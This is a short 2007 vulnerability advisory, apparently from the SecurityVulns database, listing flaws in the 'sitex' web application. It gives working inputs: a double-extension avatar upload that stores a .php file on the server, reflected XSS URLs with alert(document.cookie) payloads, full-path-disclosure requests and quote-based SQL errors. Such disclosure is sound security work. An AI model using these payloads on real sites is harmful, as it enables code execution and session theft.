sitex multiple vulnerabilities

2007-02-26T00:00:00
ID SECURITYVULNS:DOC:16187
Type securityvulns
Reporter Securityvulns
Modified 2007-02-26T00:00:00

Description

global risk:critical

upload vulnerability: in user profile upload an avatar with a double extension like : file.php.jpg once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /. but the last extension (jpg) will be removed by the script, and stored in : /content/avatars
has ramdom_numberfile.php

xss get : /sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script> /sitex/search.php?search=<script>alert(document.cookie)</script>

xss via mysql error: /sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script> /calendar_events.php?page='"><script>alert(document.cookie)</script>

full path disclosure: /sitex/calendar.php?sxMonth[]=1 /sitex/calendar.php?sxMonth=1&sxYear[]=2007 /calendar_events.php?page[]=1

multiples errors sql : just add a ' on any var .. or on any fields ( like in forum,search,...etc )

regards laurent gaffie